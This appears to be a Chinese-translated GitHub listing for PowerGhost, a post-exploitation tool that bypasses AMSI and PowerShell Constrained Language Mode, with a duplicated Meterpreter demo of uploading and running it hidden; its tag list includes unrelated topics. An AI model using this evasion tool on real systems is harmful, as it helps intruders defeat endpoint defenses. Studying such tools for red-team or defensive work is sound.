plackyhacker/PowerGhost
GitHub: plackyhacker/PowerGhost
通过创建自定义 PowerShell 运行空间来绕过 AMSI 和受约束语言模式的 Windows 后渗透工具。
Stars: 21 | Forks: 13
# PowerGhost
一个自定义运行空间,用于绕过 PowerShell 中的 AMSI 和受约束语言模式。
## 在 Meterpreter 中运行的示例
```
meterpreter > upload PowerGhost64.exe
[*] uploading : PowerGhost64.exe -> PowerGhost64.exe
[*] Uploaded 6.00 KiB of 6.00 KiB (100.0%): PowerGhost64.exe -> PowerGhost64.exe
[*] uploaded : PowerGhost64.exe -> PowerGhost64.exe
meterpreter > execute -H -i -f "PowerGhost64.exe"
Process 5276 created.
Channel 8 created.
PowerGhost by PlackyHacker
--------------------------
Type 'exit' to close.
[+] Hooking AMSI for bypass...
PG C:\Users\Placky> $ExecutionContext.SessionState.LanguageMode
FullLanguage
PG C:\Users\Placky>
```
## 在 Meterpreter 中运行的示例
```
meterpreter > upload PowerGhost64.exe
[*] uploading : PowerGhost64.exe -> PowerGhost64.exe
[*] Uploaded 6.00 KiB of 6.00 KiB (100.0%): PowerGhost64.exe -> PowerGhost64.exe
[*] uploaded : PowerGhost64.exe -> PowerGhost64.exe
meterpreter > execute -H -i -f "PowerGhost64.exe"
Process 5276 created.
Channel 8 created.
PowerGhost by PlackyHacker
--------------------------
Type 'exit' to close.
[+] Hooking AMSI for bypass...
PG C:\Users\Placky> $ExecutionContext.SessionState.LanguageMode
FullLanguage
PG C:\Users\Placky>
```
标签:AI合规, AMSI 绕过, C# 开发, DNS 反向解析, IPv6, Meterpreter, OpenCanary, PowerShell, Raspberry Pi, RFI远程文件包含, SSH蜜罐, Windows 安全, 免杀技术, 内存执行, 受限语言模式, 后渗透模块, 多人体追踪, 安全规避, 开源安全工具, 暴力破解检测, 端点可见性, 运行空间, 进程注入, 逆向工程平台